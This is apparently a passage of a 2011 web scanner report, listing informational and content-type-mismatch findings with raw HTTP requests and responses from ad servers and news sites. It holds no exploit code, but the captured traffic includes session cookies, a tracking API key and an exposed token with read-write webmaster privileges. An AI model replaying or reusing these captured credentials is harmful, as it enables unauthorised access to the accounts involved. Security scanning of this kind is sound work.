Content-Type: text/html
Date: Mon, 11 Apr 2011 16:41:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
16.30. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/ros

Request

GET /ad/iframe/3/foxnews/728x90/ros?t=1302543075864&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA2MTQ2ODcsICBuZXR3b3JrOiAgICAgICJkcml2ZXBtIiwgIHNpemU6ICAgICAgICAgIjcyOHg5MCIsICBmcmVxOiAgICAgICAgICIyMC05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjczYjY3MTJhLWRjMmQtNDA0Ny1iZmE5LTliYjdlZjYyYjJjOCIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInJvcyIsICBkaXY6ICAgICAgICAgICI3M2I2NzEyYS1kYzJkLTQwNDctYmZhOS05YmI3ZWY2MmIyYzgiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgNiwgIG5ldHdvcmtfaWQ6ICAgMzYsICBhY2NvdW50X2lkOiAgIDkzLCAgbmV0d29ya19uYW1lOiAiRFJJVkVwbSIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMC42NSIsICBmZWNwbTogICAgICAgICIwLjY1IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJyb3MiLCAgcnVsZTogICAgICAgICAicm9zIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFtdLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzEifQ==
Content-Length: 1420
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:31:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
16.31. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/300x250/ros

Request

GET /ad/iframe/3/foxnewsrtb/300x250/ros?t=1302544276627&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3NydGIiLCAgYWQ6ICAgICAgICAgICAzMzU0MjIsICBuZXR3b3JrOiAgICAgICJob3VzZSIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjItOTk5IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICI3ZmE2OWJiZi1iZmI0LTRhNWItOTBhMS1lYTlmOGQ3ZTQ0NmMiLCAgdXNlcjogICAgICAgICAiZTM2YTJmMjAtOTk4NS00ZGNkLTgyZTktNmZmMDMxMmUwMjRlIiwgIGNvdW50cnk6ICAgICAgIlVTIiwgIGNpdHk6ICAgICAgICAgIkRhbGxhcyIsICBkbWE6ICAgICAgICAgIDYyMywgIHJlZ2lvbjogICAgICAgIlRYIiwgIGlwOiAgICAgICAgICAgIjE3My4xOTMuMjE0LjI0MyIsICBkZXB0aDogICAgICAgIDEsICB0YXJnZXQ6ICAgICAgICJyb3MiLCAgZGl2OiAgICAgICAgICAiN2ZhNjliYmYtYmZiNC00YTViLTkwYTEtZWE5ZjhkN2U0NDZjIiwgIHVybDogICAgICAgICAgImh0dHA6Ly93d3cuZm94bmV3cy5jb20vcG9saXRpY3MvaW5kZXguaHRtbCIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJhZCIsICBpbXA6ICAgICAgICAgIDIsICBuZXR3b3JrX2lkOiAgIDExMSwgIGFjY291bnRfaWQ6ICAgNDk0LCAgbmV0d29ya19uYW1lOiAiSG91c2UgQXJ0IiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjM4IiwgIGZlY3BtOiAgICAgICAgIjEuMzgiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgInJvcyIsICBydWxlOiAgICAgICAgICJyb3MiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiQ29udGV4dFdlYiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTkwMCwgImJ1eSI6MzY5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTg3OSwgImJ1eSI6MTg5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTHVjaWRNZWRpYSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTg4NSwgImJ1eSI6MjAyLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiQXBwTmV4dXMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4NTksICJidXkiOjExMSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1ODcyLCAiYnV5IjoxNzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJRdWFudGNhc3QgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4NzYsICJidXkiOjE4MCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTg4MiwgImJ1eSI6MTk5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1OTA5LCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJJbnZpdGUgTWVkaWEgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU5MTIsICJidXkiOjUwNiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IngrMSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTkzOSwgImJ1eSI6OTAwLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWE2IERlZ3JlZXMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMTQxMDgwLCAiYnV5IjozMzExLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiU2ltcGxpLmZpIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjEzODg4OSwgImJ1eSI6MTA4MywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1YmVtb2d1bCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjU4OTYyMTIsICJidXkiOjg0NzEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzMwIn0=
Content-Length: 757
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:51:19 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
16.32. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/728x90/ros

Request

GET /ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3NydGIiLCAgYWQ6ICAgICAgICAgICAzMzU4NzQsICBuZXR3b3JrOiAgICAgICJtYXhwb2ludCIsICBzaXplOiAgICAgICAgICI3Mjh4OTAiLCAgZnJlcTogICAgICAgICAiMi05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjMxMjMwMTUyLTljNzItNGZhOC1iZDc2LWI1YmRhMTY0ZTQ2MCIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInJvcyIsICBkaXY6ICAgICAgICAgICIzMTIzMDE1Mi05YzcyLTRmYTgtYmQ3Ni1iNWJkYTE2NGU0NjAiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgInJlYWwtdGltZSBiaWQiLCAgaW1wOiAgICAgICAgICAyLCAgbmV0d29ya19pZDogICAyMzMsICBhY2NvdW50X2lkOiAgIDYyODksICBuZXR3b3JrX25hbWU6ICJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS43NiIsICBmZWNwbTogICAgICAgICIxLjc2IiwgIGZpbGw6ICAgICAgICAgIjEwMC4wMCIsICBwbGFjZW1lbnQ6ICAgICJyb3MiLCAgcnVsZTogICAgICAgICAicm9zIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjMuMDEiLCJhZCI6MzM1ODc0LCAiYnV5IjoxNzgsImxwIjoiaHR0cDovL3d3dy50eXNvbi5jb20vQ29uc3VtZXIvUHJvZHVjdHMvUHJvbW90aW9ucy9VbHRpbWF0ZUNoaWNrZW5TYW5kd2ljaC5hc3B4P2NtcGlkPVNhbmR3aWNoQW55TmlnaHRHU05ldHdvcmsiLCJhbiI6IiIsInN0YXR1cyI6IjMuMDEiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1OTEwLCAiYnV5Ijo1MDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWE2IERlZ3JlZXMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMTQxMTE2LCAiYnV5IjozMzEyLCJscCI6Imh0dHA6Ly93d3cudmlyZ2luYW1lcmljYS5jb20vdngvYm9va2luZy9leGl0LWhhcHBpZXI/Y2lkPWRpc18wMDA3NiIsImFuIjoiIiwic3RhdHVzIjoiMS4yMyBOIiwiZmlkIjo0ODkyLCAiZmNwbSI6IjEuNzUifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4ODAsICJidXkiOjE5NiwibHAiOiJodHRwOi8vd2VsY29tZS5ocC5jb20vY291bnRyeS91cy9lbi9jcy9ob21lX2MuaHRtbCIsImFuIjoiSFAgRGlyZWN0Iiwic3RhdHVzIjoiMC4xNCIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4ODMsICJidXkiOjIwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiaHR0cDovL3d3dy50eXNvbi5jb20vQ29uc3VtZXIvUHJvZHVjdHMvUHJvbW90aW9ucy9VbHRpbWF0ZUNoaWNrZW5TYW5kd2ljaC5hc3B4P2NtcGlkPVNhbmR3aWNoQW55TmlnaHRHU05ldHdvcmsiLCAgaG9zdDogICAgICAgICAibmotdGFnMzcifQ==
Content-Length: 1304
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">



...[SNIP]...
16.33. http://tracking.placelocal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.placelocal.com
Path:   /

Request

GET /?request=doTracking&campaign_id=8297&api_key=70e033792a53cae1ee45d73313c4cd85&invocation_code=7cbbc409ec990f19c78c75bd1e06f215&tracking_type=impression&referer=http://www.wptz.com/news/27483035/detail.html&format=serialized&cacheBusting=1264133793212 HTTP/1.1
Host: tracking.placelocal.com
Proxy-Connection: keep-alive
Referer: http://wptz.placelocal.com/flash/Ad_Frame_300.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:31:22 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Vary: Accept-Encoding
Content-Length: 69

a:3:{i:0;b:1;i:1;s:33:"Successfully saved tracking data.";i:2;a:0:{}}
16.34. http://w55c.net/ct/cms-2-frame.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w55c.net
Path:   /ct/cms-2-frame.html

Request

GET /ct/cms-2-frame.html?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=260&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: w55c.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchpubmatic=1; matchcontextweb=1; matchbluekai=1; matchrubicon=1; matchyahoo=1; matchgoogle=1; wfivefivec=bf0d68cb-2449-4e5d-8b20-461d8ec850c3; matchadbrite=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Expires: Mon, 11 Apr 2011 17:21:25 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 22 Feb 2011 19:41:35 GMT
ETag: "1548528128"
Content-Type: text/html
Accept-Ranges: bytes
Date: Mon, 11 Apr 2011 16:21:25 GMT
Server: w55c.net
Content-Length: 3381

<html>
<head>
<script type="text/javascript">

var cookie='wfivefivec',
   domain='w55c.net',
   cookiePrefix='match',
   pingURL='http://i.w55c.net/ping_match.gif',
   pixels=[],
   matchersConfig=[
       {cookieS
...[SNIP]...
16.35. http://www.rss-info.com/rss2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rss-info.com
Path:   /rss2.php

Request

GET /rss2.php?integration=js&windowopen=1&rss=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D120144%26clienttype%3Drss&number=5&width=500&ifbgcol=FFFFFF&bordercol=D0D0D0&textbgcol=F0F0F0&rssbgcol=F0F0F0&showrsstitle=1&showtext=1 HTTP/1.1
Host: www.rss-info.com
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 2906

document.write("<link rel=\"stylesheet\" href=\"http://www.rss-info.com/css/feed.css\"><center><table width=\"476\" border=\"0\" class=\"clstable\" cellspacing=\"3\">    <tr>        <td class=\"clstd\" bgcolo
...[SNIP]...
16.36. http://www.wptz.com/esi/postcaching/getKAtoken.esi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wptz.com
Path:   /esi/postcaching/getKAtoken.esi

Request

GET /esi/postcaching/getKAtoken.esi?callletters=wptz&asValue=62976 HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; __utmz=174914276.1302352179.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2064108896-1302352190176; AxData=; Axxd=1; _chartbeat2=2j1fe3rlajhbg39j; __utmv=; __utma=174914276.1441694128.1302352179.1302352179.1302352179.1; __utmc=174914276; __utmb=174914276.12.10.1302352179

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 247
Content-Type: text/html
X-IBS-CCDS-VERSION: 2.16.16
ETag: "43939fc-583-48e06a630b300"
X-IBS-CCDS-ORIGIN: origin132
Cache-Control: max-age=1450
Expires: Sat, 09 Apr 2011 12:54:51 GMT
Date: Sat, 09 Apr 2011 12:30:41 GMT
Connection: close


                               IBSYS.hrst.commentCount.onKAToken({"TOKEN":"0SD0svP/Zk58tfSWXNJ/thuqOKP802x3","METHOD":"POST","PRIVILEGES":"RW","payload_type":"json","role":"WEBMASTER","userId":4054486,
...[SNIP]...
17. Content type incorrectly stated  previous  next
There are 48 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

17.1. http://a0.twimg.com/profile_images/313260532/thurston_normal.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a0.twimg.com
Path:   /profile_images/313260532/thurston_normal.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/313260532/thurston_normal.gif HTTP/1.1
Host: a0.twimg.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=252460800
Date: Sat, 09 Apr 2011 12:34:16 GMT
Content-Length: 4686
Content-Type: image/gif
ETag: "b2c610460a5eed1329fdeecbdc38022d"
Expires: Fri, 21 Dec 2018 23:20:13 GMT
Last-Modified: Tue, 14 Jul 2009 15:40:05 GMT
Server: AmazonS3
X-Amz-Cf-Id: e6ed27012b91e4ead6145a325f426cd1616ed1437afe0b6c98f5dc28048585a18bc3179622f283b0,73a4f4e4bedcecaf1aab6f609be7a73d8af9918abbdb370a8d6f3f24ffba6c0334e75beeea78b9e1
x-amz-id-2: BGkGu/7vOjEWynzXI22n2kbWV/qq/mecyczbjqCi1U2nbzF7H3raWMHw8d3+smlt
x-amz-request-id: AAC11446F77B7A11
X-Cache: Miss from cloudfront
Connection: keep-alive

.PNG
.
...IHDR...0...0......`n....    pHYs...H...H.F.k>...    vpAg...0...0....W....IDATX.U...e.q../..lw...=......0@q    ...PH..
[.....O.....P8..II....    ..=.....Te....T.y;.UY.YU_.8..........d.1..%Q+......1H]..
...[SNIP]...
17.2. http://a1.interclick.com/getInPageJS.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJS.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJS.aspx?a=51&b=13741&cid=634302783474292484 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302543075863&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=a53875b5-a877-4a03-ad1a-e28c70299475

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Mon, 11 Apr 2011 23:33:12 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 11 Apr 2011 17:33:12 GMT
Content-Length: 6352

function isSilverlightVersionInstalled(version)
{
if (version == undefined)
version = null;

var isVersionSupported = false;
var container = null;

try
{

...[SNIP]...
17.3. http://a1.interclick.com/getInPageJSProcess.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

